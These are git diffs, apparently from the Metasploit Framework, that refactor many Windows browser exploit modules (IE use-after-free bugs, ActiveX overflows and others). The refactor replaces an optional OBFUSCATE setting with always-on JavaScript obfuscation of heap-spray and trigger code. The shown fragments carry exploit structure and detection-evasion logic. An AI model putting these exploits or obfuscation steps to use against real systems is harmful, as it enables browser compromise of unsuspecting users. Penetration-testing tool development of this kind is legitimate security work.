   include Msf::Exploit::RopDb
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
+
   autopwn_info({
     :ua_name    => HttpClients::IE,
     :ua_minver  => "6.0",
@@ -109,11 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jan 10 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
 
     register_advanced_options(
       [
@@ -286,24 +284,19 @@ class Metasploit3 < Msf::Exploit::Remote
       spray    = build_spray(my_target, leak)
     end
 
-    if datastore['OBFUSCATE']
-      spray   = ::Rex::Exploitation::JSObfu.new(spray).obfuscate
-      trigger = ::Rex::Exploitation::JSObfu.new(trigger)
-      trigger.obfuscate
-      trigger_fn = trigger.sym('trigger')
-    else
-      trigger_fn = 'trigger'
-    end
+    spray = js_obfuscate(spray)
+    trigger = js_obfuscate(trigger)
+    trigger_fn = trigger.sym('trigger')
 
     html = %Q|
     <html>
     <head>
     <script language='javascript'>
-    #{spray}
+    #{spray.to_s}
     </script>
 
     <script language='javascript'>
-      #{trigger}
+      #{trigger.to_s}
     </script>
     <script for=audio event=PlayStateChange(oldState,newState)>
       if (oldState == 3 && newState == 0) {

--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -244,7 +244,7 @@ class Metasploit3 < Msf::Exploit::Remote
     setTimeout(function(){smash_vtable()}, 700);
     JS
 
-    spray_trigger_js = js_obfuscate(spray_trigger_js).to_s
+    spray_trigger_js = js_obfuscate(spray_trigger_js)
 
     # build html
     content = <<-HTML

--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
   #  :os_name    => OperatingSystems::WINDOWS,
@@ -71,11 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Jun 12 2012',
       'DefaultTarget'  => 0))
-
-      register_options(
-        [
-          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-        ], self.class)
   end
 
   def get_target(agent)
@@ -247,10 +244,7 @@ class Metasploit3 < Msf::Exploit::Remote
     setTimeout(function(){smash_vtable()}, 700);
     JS
 
-    if datastore['OBFUSCATE']
-      spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
-      spray_trigger_js.obfuscate
-    end
+    spray_trigger_js = js_obfuscate(spray_trigger_js).to_s
 
     # build html
     content = <<-HTML

--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -80,11 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jun 12 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
 
   end
 
@@ -185,27 +182,15 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js_spray = heaplib(js_spray, {:noobfu => true})
+    js_spray = js_obfuscate(js_spray)
 
-    trigger_f = "trigger"
-    feng_shui_f = "feng_shui"
-    crash_f = "crash"
-    unescape_f = "do_unescape"
-    main_f = "main"
-    a_id = "MyA"
-    danger_id = "imgTest"
-
-    if datastore['OBFUSCATE']
-      js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
-
-      trigger_f = rand_text_alpha(rand(5) + 4)
-      feng_shui_f = rand_text_alpha(rand(5) + 4)
-      crash_f = rand_text_alpha(rand(5) + 4)
-      unescape_f = rand_text_alpha(rand(5) + 4)
-      main_f = rand_text_alpha(rand(5) + 4)
-      a_id = rand_text_alpha(rand(5) + 4)
-      danger_id = rand_text_alpha(rand(5) + 4)
-    end
+    trigger_f = js_spray.sym("trigger")
+    feng_shui_f = js_spray.sym("feng_shui")
+    crash_f = js_spray.sym("crash")
+    unescape_f = js_spray.sym("do_unescape")
+    main_f = js_spray.sym("main")
+    a_id = js_spray.sym("MyA")
+    danger_id = js_spray.sym("imgTest")
 
     html = %Q|
       <HTML>

--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     <script>
     var data;

--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -51,11 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'	  => false,
       'DisclosureDate'  => "Feb 13 2013",
       'DefaultTarget'   => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
 
   end
 
@@ -104,12 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -147,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     <script>
     var data;

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -335,15 +335,11 @@ function exploit(){
 }
     |
 
-    create_rects_func = "createRects"
-    exploit_func = "exploit"
 
-    if datastore['OBFUSCATE']
-      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
-      create_rects_func = js_trigger.sym("createRects")
-      exploit_func = js_trigger.sym("exploit")
-    end
+
+    js_trigger = js_obfuscate(js_trigger)
+    create_rects_func = js_trigger.sym("createRects")
+    exploit_func = js_trigger.sym("exploit")
 
     html = %Q|
 <html>
@@ -355,7 +351,7 @@ function exploit(){
 <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
 <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
 <script>
-#{js_trigger}
+#{js_trigger.to_s}
 </script>
 <body onload="#{create_rects_func}(); #{exploit_func}();">
 <v:oval>

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
 
   #autopwn_info({
@@ -83,12 +85,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Mar 06 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def exploit
@@ -147,11 +143,7 @@ for (var i=1; i < 0x300; i++) {
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -226,7 +218,7 @@ for (var i=1; i < 0x300; i++) {
 
   def load_exploit_html(my_target, cli)
     p  = get_payload(my_target, cli)
-    js = ie_heap_spray(my_target, p)
+    js = ie_heap_spray(my_target, p).to_s
 
     js_trigger = %Q|
 var rect_array = new Array()
@@ -264,21 +256,15 @@ function exploit(){
 }
     |
 
-    create_rects_func = "createRects"
-    exploit_func = "exploit"
-
-    if datastore['OBFUSCATE']
-      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
-      create_rects_func = js_trigger.sym("createRects")
-      exploit_func = js_trigger.sym("exploit")
-    end
+    js_trigger = js_obfuscate(js_trigger)
+    create_rects_func = js_trigger.sym("createRects")
+    exploit_func = js_trigger.sym("exploit")
 
     html = %Q|
 <html>
 <head>
 <script>
-#{js}
+#{js.to_s}
 </script>
 <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
 </head>
@@ -287,7 +273,7 @@ function exploit(){
 <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
 <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
 <script>
-#{js_trigger}
+#{js_trigger.to_s}
 </script>
 <body onload="#{create_rects_func}(); #{exploit_func}();">
 <v:oval>

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -264,7 +264,7 @@ function exploit(){
 <html>
 <head>
 <script>
-#{js.to_s}
+#{js}
 </script>
 <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
 </head>
@@ -273,7 +273,7 @@ function exploit(){
 <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
 <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
 <script>
-#{js_trigger.to_s}
+#{js_trigger}
 </script>
 <body onload="#{create_rects_func}(); #{exploit_func}();">
 <v:oval>

--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
@@ -11,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
+
   autopwn_info({
     :ua_name    => HttpClients::IE,
     :ua_minver  => "6.0",
@@ -124,11 +127,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jun 12 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -340,11 +338,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     object_id = rand_text_alpha(4)
 

--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -338,7 +338,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     object_id = rand_text_alpha(4)
 

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js_click_link.to_s}
+    #{js_click_link}
     </script>
     </head>
     <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -11,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -56,11 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jun 18 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
   end
 
   def exploit
@@ -154,20 +151,15 @@ class Metasploit3 < Msf::Exploit::Remote
     }
     |
 
-    if datastore['OBFUSCATE']
-      js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
-      js_click_link.obfuscate
-      js_click_link_fn = js_click_link.sym('clickLink')
-    else
-      js_click_link_fn = 'clickLink'
-    end
+    js_click_link = js_obfuscate(js_click_link)
+    js_click_link_fn = js_click_link.sym('clickLink')
 
 
     html = <<-EOS
     <html>
     <head>
     <script>
-    #{js_click_link}
+    #{js_click_link.to_s}
     </script>
     </head>
     <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">

--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -74,12 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jan 30 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -177,11 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -238,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -299,7 +299,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     # The overflow occurs after strcat'ing controlled data to
     # a url with the next format:

--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -128,12 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Jan 11 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
 
     deregister_options('URIPATH')
 
@@ -303,11 +299,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     # The overflow occurs after strcat'ing controlled data to
     # a url with the next format:

--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = get_spray(my_target, js_code, js_nops)
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     address = 0x0c0c0c0c / 0x134
 

--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -71,13 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Jan 11 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
-
   end
 
   def get_spray(t, js_code, js_nops)
@@ -140,11 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = get_spray(my_target, js_code, js_nops)
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     address = 0x0c0c0c0c / 0x134
 

--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -127,13 +129,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Apr 18 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
-
   end
 
   def get_easy_spray(t, js_code, js_nops, js_counter)
@@ -363,11 +358,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     if my_target['Rop'].nil?
       sploit = rand_text_alpha(my_target['Offset'])
@@ -383,7 +374,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -374,7 +374,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -132,7 +132,7 @@ EOS
 <body>
 <object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
 <script language='javascript'>
-#{js.to_s}
+#{js}
 #{main_sym}();
 </script>
 </body>

--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super(update_info(info,
@@ -60,8 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
       register_options(
         [
-          OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
-          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]),
+          OptString.new('FILENAME', [ false, 'The file name.',  'msf.html'])
         ], self.class)
   end
 
@@ -123,22 +124,15 @@ function main(){
 EOS
 
     js = js.gsub(/^ {4}/, '')
-
-    #JS obfuscation on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-      main_sym = js.sym('main')
-    else
-      main_sym = "main"
-    end
+    js = js_obfuscate(js)
+    main_sym = js.sym('main')
 
     content = <<-EOS
 <html>
 <body>
 <object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
 <script language='javascript'>
-#{js}
+#{js.to_s}
 #{main_sym}();
 </script>
 </body>

--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -77,12 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "May 23 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -180,11 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -222,7 +214,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -59,11 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => "Aug 16 2011",
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(cli, request)
@@ -125,13 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("Building spray...")
     spray = build_spray(my_target, code)
-
-    #obfuscate on demand
-    vprint_status("Obfuscating javascript...")
-    if datastore['OBFUSCATE']
-      spray = Rex::Exploitation::JSObfu.new(spray)
-      spray.obfuscate
-    end
+    spray = js_obfuscate(spray)
 
     vprint_status("Building html...")
     #Value for the 'Src' parameter of our ActiveX control
@@ -150,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
     </HEAD>
     <BODY>
     <script language='javascript'>
-    #{spray}
+    #{spray.to_s}
     </script>
     <OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240>
     <PARAM NAME="SRC" VALUE="#{trigger_file}">

--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
     </HEAD>
     <BODY>
     <script language='javascript'>
-    #{spray.to_s}
+    #{spray}
     </script>
     <OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240>
     <PARAM NAME="SRC" VALUE="#{trigger_file}">

--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -67,11 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 21 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -127,10 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
 
     #obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     bof = Rex::Text.to_unescape("\x0c" * 2048, Rex::Arch.endian(my_target.arch))
 
@@ -138,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -454,7 +454,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script language='javascript'>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -73,12 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "May 26 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def junk
@@ -346,14 +342,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-      @heap_spray_fn = js.sym("heap_spray")
-    else
-      @heap_spray_fn = "heap_spray"
-    end
+    js = js_obfuscate(js)
+    @heap_spray_fn = js.sym("heap_spray")
 
     return js
   end
@@ -464,7 +454,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script language='javascript'>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -229,7 +229,7 @@ EOS
       js = heaplib(custom_js)
 
